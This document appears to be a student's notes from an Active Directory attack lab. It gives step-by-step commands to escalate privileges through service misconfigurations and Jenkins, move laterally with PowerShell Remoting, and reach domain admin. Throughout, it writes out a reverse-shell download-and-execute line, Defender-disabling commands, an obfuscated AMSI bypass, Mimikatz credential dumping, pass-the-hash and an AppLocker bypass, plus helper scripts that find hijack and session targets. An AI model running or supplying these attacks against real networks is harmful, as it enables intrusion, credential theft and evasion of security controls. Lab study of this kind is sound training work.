Our goal is first to escalate our local privileges to local admin. Then we hunt for other machines on which our user also has local admin rights. Then, on those machines, we check whether any domain admin sessions are present.
Unquoted service path check (look for a PathName that contains spaces and is not wrapped in quotes):
Get-WmiObject -Class Win32_Service | Select-Object Name, PathName, StartName
From PowerUp:
Get-ServiceUnquoted -Verbose
Get services where the current user can write to the service binary or change the arguments passed to it:
Get-ModifiableServiceFile -Verbose
Get services whose configuration the current user can modify (members of groups such as Server Operators can do this):
Get-ModifiableService -Verbose
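The same checks done by hand, as an added example that is not part of the original notes and not PowerUp's code. It uses only built-in cmdlets: it lists services whose unquoted path contains a space, works out the intermediate paths the Service Control Manager would try before the real binary (C:\Program.exe, C:\Program Files\Some.exe, ...), and probes whether the current user can create a file in each of those directories. It also flags services whose binary lives in a directory the current user can write to. The probe creates and deletes a temp file, so it is accurate with inherited ACLs but does leave a file-creation event behind.

```powershell
# Added example, not from the original notes. Manual version of
# Get-ServiceUnquoted / Get-ModifiableServiceFile using built-in cmdlets only.

function Test-DirWritable {
    # Probe by creating and deleting a temp file in the directory.
    param([string]$Dir)
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    $probe = Join-Path $Dir ('.' + [guid]::NewGuid().ToString('N'))
    try {
        New-Item -Path $probe -ItemType File -ErrorAction Stop | Out-Null
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch { return $false }
}

function Get-ServiceExe {
    # Turn 'C:\Some Dir\svc.exe -arg' or '"C:\Some Dir\svc.exe" -arg' into the exe path.
    param([string]$PathName)
    $p = $PathName.Trim()
    if ($p.StartsWith('"')) { return ($p -split '"')[1] }
    if ($p -match '^(.*?\.exe)') { return $Matches[1] }
    return ($p -split ' ')[0]
}

$results = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    if (-not $svc.PathName) { continue }
    $exe    = Get-ServiceExe $svc.PathName
    $quoted = $svc.PathName.Trim().StartsWith('"')

    # Unquoted path with spaces: every prefix ending at a space is a hijack candidate.
    if (-not $quoted -and $exe -match ' ') {
        $parts = $exe -split ' '
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
            $dir = Split-Path -Path $candidate -Parent
            if (Test-DirWritable $dir) {
                [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName
                                   Issue = 'UnquotedPath'; Target = $candidate }
            }
        }
    }

    # Binary sitting in a directory we can write to (DLL drop / replacement after stop).
    if ((Test-Path -LiteralPath $exe -ErrorAction SilentlyContinue) -and
        (Test-DirWritable (Split-Path -Path $exe -Parent))) {
        [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName
                           Issue = 'WritableBinaryDir'; Target = $exe }
    }
}

$results | Sort-Object Service | Format-Table -AutoSize
```

The RunsAs column matters: a hijack of a service running as LocalSystem gives SYSTEM, while one running as a low-privileged virtual account gives little. Services the current user can also start or restart (sc.exe start, or a reboot) are the ones worth pursuing.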
Or run all of the above checks at once with the PowerUp.ps1 script:
. .\PowerUp.ps1
Invoke-AllChecks
help Invoke-ServiceAbuse -Examples
Invoke-ServiceAbuse -Name AbyssWebServer -UserName dcorp\student15
(Here AbyssWebServer is the abusable service name reported by Invoke-AllChecks.)
Behind the scenes, the command above reconfigures the service so that the following gets executed:
net localgroup Administrators dcorp\student15 /add
Check whether your user is now in the local Administrators group:
net localgroup Administrators
Now log off and log back on: the group membership is only applied to student15 when a new logon token is built.
At this point student15 has local admin rights on the student15 machine.
Now student15 can hunt for other machines where student15 has local admin rights. For that the PowerView.ps1 script is needed:
. C:\AD\Tools\PowerView.ps1
To find local admin access on other machines:
Find-LocalAdminAccess -Verbose
Say you find a server named dcorp-adminsrv.dollarcorp.moneycorp.local where student15 has local admin rights. How do you access it? PowerShell Remoting. On Windows Server 2012 and later it is enabled by default; on client versions of Windows you need to enable it, which requires administrative privileges:
Enable-PSRemoting
Test-WSMan (to check whether it is enabled or not)
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local
The command above drops you into a session on dcorp-adminsrv.dollarcorp.moneycorp.local as student15. Because student15 has local admin rights on that box, no password is asked for: the Kerberos credentials of your current logon session are used.
Jenkins privilege escalation:
Scenario - 1
If Jenkins is installed on the machine you want to escalate on, you need the Jenkins admin password (the username is jenkinsadmin in this lab). After logging in to Jenkins, go to the script console. The IP is the Jenkins instance's IP:
http://172.16.3.11:8080/script
There you can run a Groovy script that executes commands of your choice on the Jenkins host (again, Jenkins admin credentials are required). Here is the script. Replace whoami with the command you need; note that inside a Groovy string literal the backslash in the domain\user name has to be doubled:
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'whoami'.execute()   // e.g. 'net localgroup Administrators dcorp\\mahim.firoj /add'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
Scenario - 2
Now say Jenkins is installed on a remote machine, 172.16.3.11:8080, and you are accessing it from your student15 machine, 172.16.100.15.
If you know the Jenkins admin credentials, you can use the script above to run net localgroup Administrators dcorp\student15 /add and add your user to the local Administrators group of the Jenkins machine.
But what if you do not know the Jenkins admin credentials and only have the builduser credentials? In that case the plan is to make the Jenkins machine download and execute a reverse shell, then access that machine from the student15 machine once the shell connects back. The shell runs as the account the Jenkins service runs under. Here that is ciadmin, which is a local admin on the Jenkins box. (Jenkins does not need admin rights to run; a CI service running as a local admin is a misconfiguration, but a common one.)
From your student15 machine launch powercat as a netcat-style listener:
. C:\AD\Tools\powercat.ps1
powercat -l -v -p 443 -t 1000
On your student15 machine host a web server such as HFS and serve the reverse shell script (Invoke-PowerShellTcp.ps1 from Nishang).
Now from your student15 machine access the Jenkins instance and log in with the builduser credentials. Click on your project (Project15), then click Configure. The link should look like this:
http://172.16.3.11:8080/job/Project15/configure
On that page go to the Build section: Add build step > Execute Windows batch command.
Place the following command there (you can disable Defender before running it):
powershell iex (iwr http://172.16.100.15/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.15 -Port 443
Save, then click Build Now. The build step executes on the Jenkins system and connects back to the listener on the student15 machine. If the script gets blocked, disable Defender and AMSI on the Jenkins machine first.
Once the reverse shell is established you are running as ciadmin on the Jenkins box (dcorp-ci), which is a local admin there.
Now to find on which machines the ciadmin user has local admin access:
Find-LocalAdminAccess -Verbose
We find that ciadmin has local admin rights on the dcorp-mgmt machine.
If you need a machine where your user has local admin rights and a domain admin also has a session, use the following. Find-LocalAdminAccess -Verbose (above) shows where the current user is local admin; PowerView's Invoke-UserHunter adds the session check. Say you have just got access to a machine where ciadmin is local admin (dcorp-ci); the commands below are run from there.
Disable Defender on the dcorp-ci machine:
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Disable AMSI on the dcorp-ci machine (an obfuscated one-liner that sets the non-public static field amsiInitFailed of System.Management.Automation.AmsiUtils to true, after which PowerShell skips AMSI scanning in this process):
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Download PowerView (or any other script) straight into memory on the ciadmin machine:
iex (iwr http://172.16.100.15/PowerView.ps1 -UseBasicParsing)
Run Invoke-UserHunter to find domain admin sessions, and where you also have local admin access:
Invoke-UserHunter
Invoke-UserHunter -CheckAccess (this is the one to run: it adds a LocalAdmin column telling you whether the current user is local admin on each machine that has a domain admin session)
If you have local admin access on a remote machine, there are two ways to use it:
Enter-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
or
Invoke-Command -ScriptBlock {whoami; hostname} -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
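A minimal version of what Invoke-UserHunter -CheckAccess does, as an added example that is not part of the original notes and not PowerView's code, for when you cannot load PowerView on the box. It resolves the direct members of Domain Admins through ADSI, then uses Invoke-Command on each target to list the accounts that have a logon session there. The $targets list is an assumption (in practice feed it the output of Find-LocalAdminAccess). Win32_LoggedOnUser also reports service and network logons, which is what you want when hunting for credentials in LSASS, and nested group members of Domain Admins are not expanded.

```powershell
# Added example, not from the original notes: Invoke-UserHunter -CheckAccess
# rebuilt from ADSI and Invoke-Command. $targets is an assumed list of hosts
# where the current user is expected to be local admin.
$targets = 'dcorp-mgmt.dollarcorp.moneycorp.local',
           'dcorp-adminsrv.dollarcorp.moneycorp.local'

function Get-DomainAdminNames {
    # sAMAccountNames of the direct members of Domain Admins in the current domain.
    $searcher = [adsisearcher]'(&(objectCategory=group)(cn=Domain Admins))'
    $group = $searcher.FindOne().GetDirectoryEntry()
    foreach ($dn in @($group.member)) {
        [string]([ADSI]"LDAP://$dn").sAMAccountName
    }
}

function Find-DomainAdminSession {
    param([string[]]$ComputerName, [string[]]$DomainAdmins)
    foreach ($computer in $ComputerName) {
        try {
            # If this succeeds we have admin access over WinRM on the target.
            $sessions = Invoke-Command -ComputerName $computer -ErrorAction Stop -ScriptBlock {
                Get-CimInstance -ClassName Win32_LoggedOnUser |
                    ForEach-Object { '{0}\{1}' -f $_.Antecedent.Domain, $_.Antecedent.Name } |
                    Sort-Object -Unique
            }
        } catch {
            # No admin rights, WinRM closed, or host down: report and move on.
            Write-Warning "$computer : $($_.Exception.Message)"
            continue
        }
        foreach ($s in $sessions) {
            $user = ($s -split '\\')[-1]
            if ($DomainAdmins -contains $user) {
                [pscustomobject]@{ ComputerName = $computer; LocalAdmin = $true; DomainAdminSession = $s }
            }
        }
    }
}

$da = Get-DomainAdminNames
Find-DomainAdminSession -ComputerName $targets -DomainAdmins $da | Format-Table -AutoSize
```

Every host that returns a row is a dcorp-mgmt style target: you are local admin there and a domain admin's credentials are in its LSASS.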
Say that on dcorp-mgmt your current user ciadmin has local admin rights and a domain admin session is present. We need to dump the domain admin's NTLM hash. We can use either of the two commands above, or proceed as follows.
Assume you are on the dcorp-ci machine as ciadmin through the reverse shell from student15.
$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
There are two options for Invoke-Mimikatz.ps1: load it into memory on dcorp-ci and then run the loaded function inside the session on dcorp-mgmt, or send the script file directly into the session so it is loaded and executed in dcorp-mgmt's memory. For the first option, either download it:
iex (iwr http://172.16.100.15/Invoke-Mimikatz.ps1 -UseBasicParsing)
or dot-source it from the folder on dcorp-ci where the script is present:
. .\Invoke-Mimikatz.ps1
To check which functions are loaded in memory:
ls function:
Disable Defender on the dcorp-mgmt machine. Invoke-Command takes either -Session or -ComputerName, not both; -Session reuses the session created above. Note also that the parameter is -DisableRealtimeMonitoring:
Invoke-Command -ScriptBlock {Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-Command -ScriptBlock {Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess
Now run the Invoke-Mimikatz function loaded in dcorp-ci's memory inside the dcorp-mgmt session. ${function:Invoke-Mimikatz} is the function body as a script block, so this executes it on dcorp-mgmt (with no arguments Invoke-Mimikatz dumps logon passwords):
Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess
or send the whole script file into the session, which defines Invoke-Mimikatz there so there is no need to load it on dcorp-ci first:
Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimikatz.ps1 -Session $sess
Enter-PSSession -Session $sess
Now you are on dcorp-mgmt. Run Invoke-Mimikatz there. Invoke-Mimikatz is not interactive: with no arguments it runs sekurlsa::logonpasswords, which is the same as:
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
The output contains the domain admin's NTLM hash.
Exit from dcorp-mgmt, and also exit from the dcorp-ci reverse shell.
From your student15 machine:
Disable Defender and load Invoke-Mimikatz.ps1 by dot-sourcing it. Then run the command below. This is an over-pass-the-hash attack: the NTLM hash is used to obtain Kerberos tickets for svcadmin.
Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:<ntlm hash of svcadmin> /run:powershell.exe"'
A new PowerShell window spawns with svcadmin's credentials, but whoami still says student15. That is expected: pth creates a new logon session whose network credentials are svcadmin's while the local token is still student15's, so the new identity only shows when you authenticate to a remote host. To check:
Invoke-Command -ScriptBlock {whoami} -ComputerName dcorp-dc.dollarcorp.moneycorp.local
It returns svcadmin now.
Now we will do the same using derivative local admin access:
Derivative local admin means local admin rights on other machines that you obtain through access you already have. Say student15 has derivative local admin rights on the dcorp-adminsrv server. We will dump the hashes of other local admins from dcorp-adminsrv, then pivot with those accounts to see whether they have local admin access on a machine where a domain admin also has a session. Earlier we did the same with ciadmin from the dcorp-ci machine.
From the student15 or studentadmin machine:
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local
The problem is that dcorp-adminsrv has an AppLocker policy enabled, so we cannot use powershell.exe and cmd.exe freely, and the PowerShell language mode is set to ConstrainedLanguage instead of FullLanguage. How can we check that?
Language mode check:
$ExecutionContext.SessionState.LanguageMode
AppLocker check:
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
From the rules we learn that scripts located under the Program Files folder are allowed to run.
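The AppLocker check taken one step further, as an added example that is not part of the original notes: it reads the effective policy as XML, lists the Script rules with their path conditions, and probes whether the current user can write to each allowed location. A writable Allow path is where a script can be dropped and run in FullLanguage mode; in the page's scenario nothing under Program Files is writable for a standard user, which is why the script is copied in over the c$ share with admin rights instead. The mapping of AppLocker path variables to real folders is the documented one for %PROGRAMFILES%, %WINDIR%, %SYSTEM32% and %OSDRIVE%.

```powershell
# Added example, not from the original notes. Run inside the remote session on
# the AppLocker-protected host. Lists Script rules and probes writability.
[xml]$policy = Get-AppLockerPolicy -Effective -Xml

# AppLocker path variables are its own, not the usual environment variables.
$varMap = @{
    '%PROGRAMFILES%' = @(@($env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ })
    '%WINDIR%'       = @($env:windir)
    '%SYSTEM32%'     = @("$env:windir\System32")
    '%OSDRIVE%'      = @($env:SystemDrive)
}

function Expand-AppLockerPath {
    # '%PROGRAMFILES%\*' -> 'C:\Program Files', 'C:\Program Files (x86)'
    param([string]$Pattern)
    $roots = @($Pattern)
    foreach ($var in $varMap.Keys) {
        if ($Pattern.ToUpper().StartsWith($var)) {
            $roots = $varMap[$var] | ForEach-Object { $_ + $Pattern.Substring($var.Length) }
        }
    }
    $roots | ForEach-Object { $_ -replace '\\\*.*$', '' }   # strip the trailing \* wildcard
}

$scriptCollection = $policy.AppLockerPolicy.RuleCollection | Where-Object { $_.Type -eq 'Script' }
"Script rule enforcement: $($scriptCollection.EnforcementMode)"

foreach ($rule in @($scriptCollection.FilePathRule)) {
    foreach ($cond in @($rule.Conditions.FilePathCondition)) {
        foreach ($dir in Expand-AppLockerPath $cond.Path) {
            # Probe: create and delete a temp file (leaves a file-creation event behind).
            $writable = $false
            if (Test-Path -LiteralPath $dir -PathType Container) {
                $probe = Join-Path $dir ('.' + [guid]::NewGuid().ToString('N'))
                try {
                    New-Item -Path $probe -ItemType File -ErrorAction Stop | Out-Null
                    Remove-Item -LiteralPath $probe -Force
                    $writable = $true
                } catch { }
            }
            [pscustomobject]@{
                Action    = $rule.Action
                Rule      = $rule.Name
                AppliesTo = $rule.UserOrGroupSid
                Path      = $dir
                Writable  = $writable
            }
        }
    }
}
```

Only FilePathRule entries are expanded; publisher and hash rules are not path based and need a different bypass, so they are left out here.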
Disable Defender on the dcorp-adminsrv machine.
Now copy the modified Mimikatz script from the student15 machine to the adminsrv machine. The modified script (Invoke-MimikatzEx.ps1) is Invoke-Mimikatz.ps1 with a call to Invoke-Mimikatz added at its end; the unmodified script is of no use here because it could not be dot-sourced anyway. From the student15 machine:
Copy-Item .\Invoke-MimikatzEx.ps1 '\\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\Program Files\'
Now access the adminsrv machine using PowerShell Remoting and launch Mimikatz from there:
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local
Change to the Program Files folder, then:
.\Invoke-MimikatzEx.ps1
(In this case we cannot load the module with Import-Module or dot-sourcing because the language mode is ConstrainedLanguage. Instead we run the script directly from the allowed Program Files path, where AppLocker lets it run in FullLanguage mode; the function call appended at the end of the script invokes Invoke-Mimikatz, which runs sekurlsa::logonpasswords. The output lists the hashes of many users.)
From here you get the NTLM hash of the srvadmin user, who is a local admin on the dcorp-adminsrv machine.
Now, either on the student15 machine or on the adminsrv machine, run the command below (make sure Invoke-Mimikatz is loaded there):
Invoke-Mimikatz -Command '"sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /ntlm:<ntlm hash of srvadmin> /run:powershell.exe"'
A new PowerShell session spawns under the context of srvadmin.
Load PowerView there:
. C:\AD\Tools\PowerView.ps1
Find-LocalAdminAccess -Verbose
You find a machine, dcorp-mgmt, where srvadmin has local admin rights.
Now check whether any machine has a domain admin session while srvadmin is also local admin on it:
Invoke-UserHunter -CheckAccess
You find that on dcorp-mgmt srvadmin has local admin rights and a domain admin session is present.
Now access dcorp-mgmt:
Enter-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
Bypass AMSI there and, if needed, disable Defender as well.
Download and load Mimikatz into the memory of the dcorp-mgmt server, then dump the logon passwords (the two forms below are equivalent):
iex (iwr http://172.16.100.15/Invoke-Mimikatz.ps1 -UseBasicParsing)
Invoke-Mimikatz
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
Avi